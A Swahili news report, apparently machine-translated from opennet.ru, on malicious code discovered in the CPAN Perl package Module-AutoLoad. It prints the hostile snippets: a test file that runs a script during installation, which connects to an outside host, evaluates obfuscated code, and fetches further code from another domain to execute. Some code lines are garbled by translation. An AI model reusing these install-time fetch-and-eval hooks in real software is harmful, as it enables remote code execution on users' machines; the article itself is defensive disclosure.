Msimbo hasidi umegunduliwa katika kifurushi cha Module-AutoLoad Perl

Katika kifurushi cha Perl kilichosambazwa kupitia saraka ya CPAN Moduli-Pakia Kiotomatiki, iliyoundwa ili kupakia kiotomati moduli za CPAN kwenye nzi, kutambuliwa kanuni hasidi. Ingizo hasidi lilikuwa kupatikana katika kanuni ya mtihani 05_rcx.t, ambayo imekuwa ikisafirishwa tangu 2011.
Ni vyema kutambua kwamba maswali kuhusu kupakia msimbo wenye shaka yalizuka Stackoverflow nyuma mwaka 2016.

Shughuli hasidi huanzia kwenye jaribio la kupakua na kutekeleza msimbo kutoka kwa seva nyingine (http://r.cx:1/) wakati wa utekelezaji wa jaribio lililozinduliwa wakati wa kusakinisha moduli. Inachukuliwa kuwa msimbo uliopakuliwa awali kutoka kwa seva ya nje haukuwa mbaya, lakini sasa ombi linaelekezwa kwenye kikoa cha ww.limera1n.com, ambacho hutoa sehemu yake ya msimbo kwa utekelezaji.

Kupanga upakuaji katika faili 05_rcx.t Nambari ifuatayo inatumika:

my $prog = __FILE__;
$prog =~ s{[^/]+\.t}{../contrib/RCX.pl}x;
my $try = `$^X $prog`;

Msimbo uliobainishwa husababisha hati kutekelezwa ../contrib/RCX.pl, yaliyomo ambayo yamepunguzwa kwa mstari:

tumia lib do{eval<$b>&&botstrap("RCX")if$b=new IO::Socket::INET 82.46.99.88.":1β€³};

Hati hii inapakia changanyikiwa kwa kutumia huduma perlobfuscator.com msimbo kutoka kwa seva pangishi ya nje r.cx (misimbo ya herufi 82.46.99.88 inalingana na maandishi "R.cX") na kuitekeleza katika uzuiaji wa eval.

$ perl -MIO::Soketi -e'$b=IO mpya::Soketi::INET 82.46.99.88.":1β€³; chapisha <$b>;'
eval unpack u=>q{_<')I;G1[)&(];F5W($E/.CI3;V-K970Z.DE….}

Baada ya kufungua, ifuatayo hatimaye inatekelezwa: code:

print{$b=new IO::Socket::INET"ww.limera1n.com:80β€³}"GET /iJailBreak
";evalor return onya$@while$b;1

Kifurushi chenye matatizo sasa kimeondolewa kwenye hifadhi. SITISHA (Perl Authors Upload Server), na akaunti ya mwandishi wa moduli imezuiwa. Katika kesi hii, moduli bado inabaki inapatikana kwenye kumbukumbu ya MetaCPAN na inaweza kusakinishwa moja kwa moja kutoka kwa MetaCPAN kwa kutumia baadhi ya huduma kama vile cpanminus. Imebainikakwamba kifurushi hakikusambazwa sana.

Kuvutia kujadili kushikamana na mwandishi wa moduli, ambaye alikanusha habari kwamba msimbo hasidi uliingizwa baada ya tovuti yake "r.cx" kudukuliwa na kueleza kuwa alikuwa akiburudika tu, na alitumia perlobfuscator.com si kuficha kitu, lakini kupunguza ukubwa. ya msimbo na kurahisisha kunakili kwake kupitia ubao wa kunakili. Chaguo la jina la chaguo la kukokotoa "botstrap" linaelezewa na ukweli kwamba neno hili "linasikika kama bot na ni fupi kuliko bootstrap." Mwandishi wa moduli pia alihakikisha kuwa upotoshaji uliotambuliwa haufanyi vitendo vibaya, lakini unaonyesha tu upakiaji na utekelezaji wa nambari kupitia TCP.

Chanzo: opennet.ru

Kuongeza maoni